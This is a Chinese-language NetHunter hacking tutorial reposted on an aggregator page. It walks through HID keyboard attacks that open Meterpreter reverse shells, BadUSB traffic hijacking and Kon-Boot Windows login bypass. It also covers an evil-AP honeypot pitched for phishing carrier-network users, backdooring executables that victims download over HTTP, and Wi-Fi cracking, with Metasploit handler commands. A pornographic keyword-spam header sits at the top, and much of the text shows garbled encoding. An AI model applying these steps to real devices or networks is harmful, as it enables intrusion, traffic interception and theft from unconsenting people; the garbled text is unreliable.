日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

Pocket Hacking: NetHunter实战指南

發(fā)布時(shí)間:2025/3/15 编程问答 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Pocket Hacking: NetHunter实战指南 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

0x00 前言


許多朋友都希望Hacking套件可以很方便的從PC移植到更便攜的手機(jī)或平板電腦上,而Offensive Security團(tuán)隊(duì)發(fā)布的Kali NetHunter則將這一期待變?yōu)楝F(xiàn)實(shí),通過(guò)移動(dòng)終端隨時(shí)隨地進(jìn)行Hacking,暫且美其名曰口袋Hacking.

Kali NetHunter是以Nexus(手機(jī)/平板)為基本硬件設(shè)備(新增對(duì)1+手機(jī)的支持),基于原生Android實(shí)現(xiàn)的便攜滲透測(cè)試平臺(tái).熟悉的Kali使其易于上手,而圖形化控制界面則使某些測(cè)試更易.基于此平臺(tái),工程師們也可自由發(fā)揮,加入個(gè)人項(xiàng)目.

關(guān)于NetHunter國(guó)內(nèi)外文章相對(duì)較少且重復(fù)度高,故在此將其主要實(shí)戰(zhàn)技巧加以整理介紹,以備各位愛(ài)好者參考.由于資料不足,難免出錯(cuò)之處,如有疏漏錯(cuò)誤,望不吝賜教.

0x01 硬件支持


NetHunter官網(wǎng)給出以下支持刷入NetHunter的手機(jī):

Nexus 4 (GSM) - “mako” Nexus 5 (GSM/LTE) - “hammerhead” Nexus 7 [2012] (Wi-Fi) - “nakasi” Nexus 7 [2012] (Mobile) - “nakasig” Nexus 7 [2013] (Wi-Fi) - “razor” Nexus 7 [2013] (Mobile) - “razorg” Nexus 10 (Tablet) - “mantaray” OnePlus One 16 GB - “bacon” OnePlus One 64 GB - “bacon”

值得一提的是,2015年NetHunter更新,由于1+手機(jī)的廉價(jià)與高性能,其被加入支持列表.用1+手機(jī)的朋友有福了,以下刷機(jī)以Nexus5為例.

0x02 刷機(jī)流程


官網(wǎng)給出幾種刷機(jī)方式,推薦使用Windows引導(dǎo)刷機(jī)程序安裝.下載地址:

https://www.kali.org/offsec-nethunter-installer/Kali_v1.1.6.sfx.exe

打開(kāi)安裝引導(dǎo)程序,默認(rèn)路徑安裝

安裝后自動(dòng)運(yùn)行NetHunter Installer并更新,進(jìn)入引導(dǎo)安裝步驟

  • Step1,選擇已有硬件設(shè)備型號(hào).

  • Step2,安裝驅(qū)動(dòng)

可以通過(guò)Test Drivers測(cè)試是否安裝成功

  • Step3,安裝選項(xiàng)

如已經(jīng)通過(guò)官網(wǎng)下載過(guò)刷機(jī)包,通過(guò)Browser選擇文件.下載鏈接 http://www.offensive-security.com/kali-linux-nethunter-download/ 下載后記得校驗(yàn)SHA1值.至于Android Flash Setting,因?yàn)閷?duì)Android L的支持還未完成,故尚未開(kāi)放選擇.

  • Step4,下載文件

如圖示,下載所有依賴文件.

所有依賴包都為Ready可進(jìn)入下一步刷機(jī).

  • Step5,解鎖設(shè)備

解鎖bootloader,注意需設(shè)置允許USB調(diào)試,手機(jī)會(huì)重啟解鎖.

  • Step6,重置原Android

同樣再手機(jī)上勾選允許USB調(diào)試,注意數(shù)據(jù)會(huì)清空,記得備份.

  • Step7,刷入NetHunter

經(jīng)過(guò)上一步重置手機(jī)后,需重新開(kāi)啟開(kāi)發(fā)者模式,此時(shí)可刷入Kali Linux鏡像并對(duì)手機(jī)進(jìn)行Root,所需時(shí)間相對(duì)較長(zhǎng).(注:如鏡像推送不成功,可以手工將kali_linux_nethunter_1.10_hammerhead_kitkat.zip復(fù)制到/sdcard/download/目錄進(jìn)行INSTALL)

  • Final,安裝成功

0x03 推薦APP一覽


完成系統(tǒng)刷入后,要豐富NetHunter原裝工具,可以下載部分安卓APP以配合.以下為個(gè)人推薦

  • 中文輸入法:作為一個(gè)漢語(yǔ)狗還是必備的

  • 文件管理器(如RootExplorer):Kali某些文件需要通過(guò)支持Root權(quán)限的文件管理器.

  • ShadowSocks:梯子還是要有的

    https://github.com/shadowsocks/shadowsocks-android/releases/download/v2.6.2/shadowsocks-nightly-2.6.2.apk

  • MiTM工具:

    zANTI2:雖為商業(yè)化限制部分功能,但使用體驗(yàn)的確好些. dSploit:曾經(jīng)很出名 lanmitm:國(guó)內(nèi)安全工作者編寫(xiě)發(fā)布的工具 Intercepter-NG:嗅探工具 Network Spoofer:自帶許多調(diào)戲功能
  • IPTools:部分常見(jiàn)基本網(wǎng)絡(luò)工具集合

  • ChangeHostname:修改當(dāng)前手機(jī)主機(jī)名HostName(還是有必要的).

  • WiGLE wifi:War Driving工具,收集無(wú)線熱點(diǎn)信息,可保存到本地?cái)?shù)據(jù)庫(kù).

  • SQLiteEditor:方便讀取數(shù)據(jù)庫(kù)信息

  • Hacker's KeyBoard:NetHunter自帶,便于輸入各種控制字符

  • 遠(yuǎn)程桌面:NetHunter自帶,便于連接VNC服務(wù).

  • DriveDroid:NetHunter自帶,將手機(jī)內(nèi)鏡像模擬為啟動(dòng)盤(pán).

0x04 目錄與服務(wù)


安裝好NetHunter,先要對(duì)其目錄與服務(wù)研究一番.Kali NetHunter根目錄對(duì)應(yīng)安卓系統(tǒng)目錄的/data/local/kali-armhf目錄

NetHunter自帶工具,也多在此目錄內(nèi).故如有抓包/日志等文件,找不到存放地址,不妨到此目錄下尋覓一番(注:需Root權(quán)限).另外,NetHunter某些工具運(yùn)行時(shí)的提示的目錄,也多以此處為根目錄.

通常,截獲的數(shù)據(jù)包等文件存放在NetHunter目錄下的Captures目錄:

與Kali Linux類似,/usr/share下存放了大部分工具,并建立link,命令行可直接調(diào)用.

而Metasploit則依然位于/opt/目錄下.

上圖中/opt/dic目錄則存放有字典文件,可自行補(bǔ)充.

此為/var/www目錄,想來(lái)大家也知道是何用處了:)

至于服務(wù),Offensive Security團(tuán)隊(duì)在新版中加入NetHunter Home以APP的形式管理服務(wù)開(kāi)關(guān),避免了之前版本通過(guò)WebServer管理的弊端(比如Web頁(yè)面調(diào)用Google Fonts被墻卡半天 ;)

如圖示,NetHunter Home為主頁(yè)面,除了Offensive Security的Banner,還可以獲取當(dāng)前IP(內(nèi)網(wǎng)/外網(wǎng))地址.

Kali Launcher整合了四個(gè)啟動(dòng)器:

  • 終端打開(kāi)一個(gè)Kali Shell
  • 終端打開(kāi)Kali NetHunter Menu
  • 終端打開(kāi)Wifite進(jìn)入無(wú)線破解
  • 更新Kali NetHunter(執(zhí)行sudo -c bootkali update)

對(duì)于NetHunter服務(wù)開(kāi)關(guān)控制,則在Kali Service Control面板里進(jìn)行設(shè)置

可看到,NetHunter可開(kāi)放服務(wù)有SSH,Dnsmasq,Hostapd,OpenVPN,Apache,Metasploit及BeEF FrameWork等.

  • SSH服務(wù):Secure Shell,方便其他設(shè)備連接控制.
  • Dnsmasq服務(wù):DNS解析服務(wù).
  • Hostapd服務(wù):提供無(wú)線接入點(diǎn)服務(wù).
  • OpenVPN服務(wù):開(kāi)放OpenVPN連入服務(wù).
  • Apache服務(wù):WEB服務(wù).
  • Metasploit服務(wù):為MSF攻擊模塊提供保障.
  • BeEF FrameWork服務(wù):XSS利用框架服務(wù).

在此面板可對(duì)對(duì)應(yīng)服務(wù)進(jìn)行開(kāi)關(guān)設(shè)置.

0x05 Kali NetHunter Menu


在NetHunter Launcher中Kali Menu的啟動(dòng)項(xiàng),其包含整理有NetHunter常用工具,如圖:

與上一個(gè)版本相比,新增了以下選項(xiàng):

USB Attacks NFC Attacks Monitor Mode Eject USB Wifi

主要模塊及介紹如下:

Wireless Attacks

  • Wifite

    自動(dòng)無(wú)線安全審計(jì)工具

  • Kismet

    無(wú)線WarDriving工具

  • AP F**ker

    無(wú)線網(wǎng)惡意攻擊工具(多為拒絕服務(wù))

  • Wash

    掃描開(kāi)啟WPS的無(wú)線網(wǎng)絡(luò)

  • Airodump-ng

    基本無(wú)線攻擊套件(必備)

  • Pingen

    針對(duì)某些開(kāi)啟WPS的D-link的路由器計(jì)算其PIN碼以破解

Sniffing/Spoofing

  • tcpdump

    基本流量Dump工具

  • tshark

    WireShark的Cli工具,可抓取分析流量

  • urlsnarf

    Dsniff工具包一部分,可嗅探HTTP請(qǐng)求包內(nèi)容,并以CLF通用日志格式輸出

  • dsniff

    強(qiáng)大的知名口令嗅探工具包

  • MITMproxy

    中間代理,可截獲修改HTTP流量,參考官網(wǎng)介紹

Reverse Shells

  • AutoSSH

    通過(guò)SSH反彈shell(NAT Bypass)

  • pTunnel

    通過(guò)ICMP數(shù)據(jù)包隧道傳送數(shù)據(jù)

Info Gathering

  • Spiderfoot

    開(kāi)源掃描與信息收集工具,對(duì)給定域名收集子域,Email地址,web服務(wù)器版本等信息,自動(dòng)化掃描.

  • Recon-ng

    強(qiáng)大的信息收集工具,模塊化,可惜許多插件國(guó)內(nèi)不適用(有墻).

  • Device-pharmer

    通過(guò)Shodan搜索,大數(shù)據(jù)Hacking.

Vulnerability Scan

  • OpenVas

    漏洞掃描器,需額外安裝.Kali一直默認(rèn)包含,好不好用客官自行定奪. :)

Exploit Tools

  • Metasploit

    強(qiáng)大,核心,必備

  • BeEF-XSS

    XSS滲透測(cè)試工具,看個(gè)人習(xí)慣使用

  • Social-Engineering-Toolkit

    Kali下的SET,社會(huì)工程學(xué)套件,功能強(qiáng)大.

  • MITMf

    中間人攻擊框架,基于Python,擁有多個(gè)插件,滲透測(cè)試功能強(qiáng)大

OpenVPN Setup

OpenVPN設(shè)置

VNC Setup

VNC設(shè)置

Log/Capture Menu

可擦除本地所有抓取數(shù)據(jù)或同步到SD卡上(同步主要是解決權(quán)限問(wèn)題.比如多數(shù)安卓APP未獲得root權(quán)限是無(wú)法讀取NetHunter工具截獲的數(shù)據(jù)內(nèi)容)

USB Attacks

  • Dictionary based brute force attack

    自動(dòng)輸入字典一行內(nèi)容并回車,基于HID,模擬操作方式的暴力破解

  • deADBolt

    執(zhí)行一堆ADB命令可以推送隱私文件等信息到指定目錄,參考項(xiàng)目主頁(yè) https://github.com/photonicgeek/deADBolt

NFC Attack

提供了復(fù)制、重寫(xiě)、查看M卡數(shù)據(jù)功能(是不是不必帶上Acr122u了;)

Settings

  • 修改時(shí)區(qū)
  • 為Metasploit創(chuàng)建用戶和數(shù)據(jù)庫(kù)
  • 修改MAC地址
  • 安裝NodeJS

Service

  • SSH服務(wù)開(kāi)關(guān)
  • VNC服務(wù)開(kāi)關(guān)
  • OpenVPN服務(wù)開(kāi)關(guān)
  • 在本地啟動(dòng)Xserver

Monitor Mode

啟動(dòng)或關(guān)閉wlan1(外置無(wú)線網(wǎng)卡)的混雜監(jiān)聽(tīng)模式

Eject USB Wifi

彈出USB無(wú)線網(wǎng)卡

0x06 HID KeyBoard Attack


在過(guò)去,USB自啟往往依賴插入的USB設(shè)備中的autorun.inf實(shí)現(xiàn).時(shí)下這招往往不靈,而新興的USB HID Attack則成為新的安全威脅.USB HID可通過(guò)模擬鍵盤(pán)或鼠標(biāo)操作,實(shí)時(shí)執(zhí)行目標(biāo)代碼,在此以PowerSploit結(jié)合MSF為例:

首先運(yùn)行提供payload的webserver,在Kali Service Control中開(kāi)啟Apache服務(wù)器

轉(zhuǎn)到HID攻擊配置頁(yè)面,選擇PowerSploit

IP和端口填寫(xiě)MSF監(jiān)聽(tīng)的IP端口,Payload我們選擇windows/meterpreter/reverse_https,URL為提供Apache服務(wù)的IP,這里即本機(jī):192.168.1.151

配置好后UPDATE配置文件,接下來(lái)需配置MSF監(jiān)聽(tīng)反彈shell

root@kali:~# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) >

payload同HID配置頁(yè)面中的payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https

IP和端口同樣設(shè)置

msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.0.17 LHOST => 192.168.0.17 msf exploit(handler) > set LPORT 4444 LPORT => 443 msf exploit(handler) > exploit[*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler...

至此配置OK

開(kāi)始監(jiān)聽(tīng)

此時(shí)將設(shè)備連接至PC機(jī),等待設(shè)備被識(shí)別后,執(zhí)行Execute,攻擊開(kāi)始.

POWERSHELL命令執(zhí)行后,就可在msf中看到反彈的shell了:

如連上PC后沒(méi)有反應(yīng),可按Reset USB鍵更新.

當(dāng)然,HID KeyBoard Attack也提供了Windows CMD攻擊模塊,即連入計(jì)算機(jī)后自動(dòng)打開(kāi)CMD并執(zhí)行指定命令(默認(rèn)為添加新管理員用戶,可自由定制).

0x07 BadUSB MITM Attack


BadUSB Attack是BlackHat大會(huì)上公布的一種較先進(jìn)的USB攻擊方式,模擬鍵盤(pán)操作等Payload可自動(dòng)執(zhí)行某些操作,而NetHunter的BadUSB MiTM Attack則是其中一種玩法:修改網(wǎng)絡(luò)設(shè)定,劫持網(wǎng)絡(luò)流量.

關(guān)于BadUSB MITM Attack,NetHunter官網(wǎng)有演示視頻,詳見(jiàn)http://www.nethunter.com/showcase/,但并未交代詳細(xì)過(guò)程,以下筆者操作為例:

首先,確保手機(jī)連接目標(biāo)計(jì)算機(jī)時(shí),MTP文件傳輸是關(guān)閉的.連接目標(biāo)計(jì)算機(jī),打開(kāi)手機(jī)USB網(wǎng)絡(luò)共享:

此時(shí)在NetHunter Home打開(kāi)一個(gè)Kali Shell,查看網(wǎng)卡多出虛擬網(wǎng)卡rndis0(USB網(wǎng)絡(luò)共享網(wǎng)卡).

此時(shí)可以開(kāi)啟Tcpdump截獲流量,命令如:

tcpdump -i rndis0

回到NetHunter Home,切換到BadUSB MiTM Attack,勾選右上角選項(xiàng)Start BadUSB Attack

被連接的計(jì)算機(jī)此時(shí)會(huì)多出一個(gè)網(wǎng)卡,網(wǎng)關(guān)為rndis0的IP地址

此時(shí)流量已可以截獲,例如訪問(wèn)某些網(wǎng)站,手機(jī)tcpdump處流量顯示如圖:

因?yàn)槭謾C(jī)并未插入SIM卡,無(wú)網(wǎng)絡(luò),故PC機(jī)并無(wú)法得到返回頁(yè)面.

之前有同學(xué)在Drops分享的一片文章Kali Nethunter初體驗(yàn)中提到:

出現(xiàn)雙網(wǎng)關(guān)現(xiàn)在所以并未像官網(wǎng)演示的那樣流量直接走向惡意網(wǎng)關(guān)(10.0.0.1)而是依舊走的之前的網(wǎng)關(guān)(192.168.1.1)故劫持失敗

這種情況也可能出現(xiàn),不過(guò)個(gè)人測(cè)試中,網(wǎng)絡(luò)連接優(yōu)先級(jí),默認(rèn)劫持后的網(wǎng)關(guān)優(yōu)先級(jí)更高,故流量可以正常劫持.也可能是NetHunter今年更新后做的優(yōu)化,如圖示:

當(dāng)然,配合HID Keyboard Attack進(jìn)行攻擊測(cè)試也是很好的方式,至于數(shù)據(jù)包的保存與分析,則可自行發(fā)揮.

0x08 繞過(guò)Windows登錄認(rèn)證


NetHunter其實(shí)有許多隱藏玩法,比如借助DriveDroid實(shí)現(xiàn)Windows登陸繞過(guò)密碼.

DriveDroid本是個(gè)允許通過(guò)安卓手機(jī)中的ISO/IMG鏡像文件引導(dǎo)啟動(dòng)PC機(jī)的一個(gè)App,但結(jié)合了特定的鏡像,實(shí)現(xiàn)繞過(guò)Windows登陸認(rèn)證就變得可行:)

在此以Win7為例,首先為默認(rèn)賬戶創(chuàng)建密碼hello.

DriveDroid默認(rèn)引導(dǎo)鏡像存放目錄位于SDCard/Download/images,只需將欲引導(dǎo)的鏡像存放于此目錄即可.

這里繞過(guò)Windows或OSX登陸認(rèn)證的鏡像為Kon-Boot.可以到官網(wǎng)了解,其原理在于處理BIOS修改系統(tǒng)內(nèi)核的引導(dǎo)處理,跳過(guò)SAM檢查,直接登陸系統(tǒng).因?yàn)槭歉顿M(fèi)軟件,以下以自行尋覓的鏡像為例演示.

關(guān)閉MTP文件傳輸,打開(kāi)DriveDroid,自動(dòng)列出images目錄下得鏡像文件.

選擇Kon-Boot.img鏡像掛載,模式這里選擇為Read-Only USB

加載成功后相應(yīng)鏡像有所標(biāo)志

而在連入的PC機(jī)中也會(huì)顯示加載有新的可移動(dòng)磁盤(pán)(或軟驅(qū)盤(pán)),如未能顯示,可在配置頁(yè)面進(jìn)行相應(yīng)調(diào)整(可通過(guò)USB Setup Wizard向?qū)е敢?

此時(shí)在設(shè)有密碼的PC機(jī)重啟,進(jìn)入BIOS設(shè)置啟動(dòng)項(xiàng)

如果鏡像加載成功,可以看到飛奔的圖案如下:

之后登陸用戶密碼處回車即可繞過(guò)密碼認(rèn)證登陸系統(tǒng)

需要說(shuō)明的是,通過(guò)此方式登陸系統(tǒng)無(wú)法直接修改或刪除系統(tǒng)密碼.

0x09 WarDriving


猶記得當(dāng)年前輩們肩扛筆記本做WarDriving的事跡,智能設(shè)備發(fā)展至今,WarDriving已可用便攜設(shè)備取代.只是至今遲遲沒(méi)有尋覓到比較合適直觀的WarDriving工具,期待有朋友能開(kāi)發(fā)或推薦個(gè).

在NetHunter下,Kali-Menu的Wireless模塊中Kismet作為WarDriving的默認(rèn)工具,不過(guò)操作起來(lái)畫(huà)面太美不敢看:

退而求其次,推薦使用App WigleWifi.不過(guò)注意不要不小心上傳數(shù)據(jù).使用easy,界面很難看.

好在數(shù)據(jù)可以以Sqlite數(shù)據(jù)庫(kù)格式存儲(chǔ)在本地.

0x10 Mana EvilAP蜜罐


想建個(gè)CMCC無(wú)線網(wǎng)絡(luò)釣魚(yú)劫持流量?PineApple沒(méi)有帶在身邊,不妨拿出手機(jī),開(kāi)個(gè)蜜罐吧. :)

Mana蜜罐采用與PineApple相同的:Hostapd的Karma補(bǔ)丁,可用來(lái)欺騙接入無(wú)線網(wǎng)絡(luò)用戶,使其可很平滑連接到虛假AP中,進(jìn)行后續(xù)攻擊.

需要說(shuō)明的是,NetHunter無(wú)線攻擊模塊,大都需要使用OTG外接USB無(wú)線網(wǎng)卡.主流芯片(可以試試Kali是否可直接識(shí)別)網(wǎng)卡均可.WN722N較為推薦,迷你的EDUP網(wǎng)卡通用性則較強(qiáng)(Raspberry Pi也可直接識(shí)別),只是信號(hào)強(qiáng)度..自然可想而知.

Mana蜜罐有多種Hacking模式,均為sh腳本,可自由定制.Mana工具安裝目錄為:

/usr/share/mana-toolkit

啟動(dòng)腳本則在此處存放:

/usr/share/mana-toolkit/run-mana

截獲流量文件存放于:

/var/lib/mana-toolkit

通過(guò)NetHunter Home的Mana蜜罐頁(yè)面可方便的對(duì)配置文件進(jìn)行修改:

Hostapd配置文件

DHCP服務(wù)配置文件

DNS欺騙配置文件

服務(wù)啟動(dòng)腳本有多個(gè),均可自由編輯修改:

上圖對(duì)應(yīng)腳本start-nat-full.sh,腳本需要USB無(wú)線網(wǎng)卡(存在上行流量)啟動(dòng),無(wú)線連入為NAT模式,并啟動(dòng)所有腳本包括:firelamb,sslstrip,sslsplit等,截獲流量并保存.

start-nat-simple.sh同樣有上行流量,但并不啟動(dòng)firelamb,sslstrip,sslsplit等腳本.

start-nat-simple-bdf.sh,加入了BDF惡意代碼Inject工具,后面章節(jié)將對(duì)其攻擊思路進(jìn)行介紹.

此外,還有

start-noupstream.sh

Mana作為無(wú)法上網(wǎng)的虛假AP啟動(dòng),但可吸引WIFI默認(rèn)開(kāi)啟的終端自動(dòng)連接并抓取信息.

start-noupstream-eap.sh

Mana同樣無(wú)法上網(wǎng),但會(huì)進(jìn)行EAP攻擊

編輯好啟動(dòng)文件后,Start Attack,會(huì)彈窗勾選啟動(dòng)腳本:

即可啟動(dòng)服務(wù).

0x11 Backdooring Executable Over HTTP


這個(gè)攻擊思路就比較有趣了,新功能在NetHunter今年1月5號(hào)發(fā)布的版本中作為Kali Nethunter目前最新最酷炫的玩法,源于secret squirrel的github項(xiàng)目the-backdoor-factory和BDFProxy,可讓我們輕松地對(duì)使用HTTP協(xié)議傳送的二進(jìn)制文件注入shellcode.

首先建立一個(gè)Mana蜜罐,SSID這里使用默認(rèn)名稱internet,啟動(dòng)服務(wù)

cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf.sh

再開(kāi)一個(gè)Shell,編輯bdfproxy.cfg,此配置文件包含了針對(duì)不同平臺(tái)默認(rèn)設(shè)置的payload,可自行更換.不過(guò)由于顯示問(wèn)題,用nano編輯文本會(huì)一行行刷新,還是換個(gè)方式編輯比較好.這里只把IP修改192.168.1.151,也可在Nethunter的主面板下的MANA Evil Access Point中進(jìn)行配置.

nano /etc/bdfproxy/bdfproxy.cfg

配置好IP之后,在Shell中直接輸入bdfproxy運(yùn)行之.

再新開(kāi)一個(gè)Shell啟動(dòng)Metasploit

一切準(zhǔn)備就緒,等待連入蜜罐AP的PC機(jī)上網(wǎng)下載二進(jìn)制文件,在此通過(guò)百度下載everything(神器啊)演示:

運(yùn)行everthing,因?yàn)樽⑷肓藀ayload,會(huì)出現(xiàn)自校驗(yàn)失敗的提示

查看MSF,已成功反彈回Shell了.而上面自校驗(yàn)失敗的提示就是MeterPreter的screenshot幫我截取的 :)

不得不說(shuō),這個(gè)新特性真的很Cool.

0x12 Wifite破解


寫(xiě)到最后,還沒(méi)有提到無(wú)線破解是不科學(xué)的;) NetHunter推薦的Wifite破解工具是其最早集成的功能之一.移動(dòng)設(shè)備的便攜性更有利于隨時(shí)隨地進(jìn)行Wifi安全測(cè)試,只需掛載上外置無(wú)線網(wǎng)卡便可輕松抓包破解.不過(guò)并不建議直接在移動(dòng)設(shè)備上破解抓到的包,如跑幾分鐘沒(méi)結(jié)果,就拿高性能設(shè)備破解吧,否則易導(dǎo)致設(shè)備死機(jī).

連接好外置無(wú)線網(wǎng)卡后,在Nethunter主菜單選擇Launch Wifite即可進(jìn)入

選擇開(kāi)啟混雜監(jiān)聽(tīng)模式的網(wǎng)卡,選擇Wlan1

掃描開(kāi)始,每5秒更新一次,當(dāng)確認(rèn)攻擊目標(biāo)后CTRL+C停止掃描

輸入攻擊目標(biāo)序號(hào),這里就選XDSEC-WIFI了,輸入2

抓包成功后自動(dòng)調(diào)用字典破解,這里機(jī)智的把字典刪掉,其自動(dòng)退出

抓到的握手包存放在/data/local/kali-armhf/HS目錄下,命名規(guī)則是SSID+MAC

如果目標(biāo)開(kāi)啟WPS,則自動(dòng)進(jìn)行PIN碼破解.

Wifite相對(duì)傻瓜化,易操作,適合移動(dòng)終端.對(duì)無(wú)線網(wǎng)密碼測(cè)試筆者也成功過(guò)幾次,連入無(wú)線后結(jié)合zANTI等工具調(diào)戲即可:)

0x13 寫(xiě)在最后


文末,已將NetHunter大部分實(shí)戰(zhàn)玩法進(jìn)行相應(yīng)介紹,文章為卷毛zing同學(xué)與順毛le4f同學(xué)共同編寫(xiě),能力有限,如有不足之處望指出.拋磚引玉,期待有更多技巧分享.


原文地址: http://drops.wooyun.org/tips/4634

總結(jié)

以上是生活随笔為你收集整理的Pocket Hacking: NetHunter实战指南的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。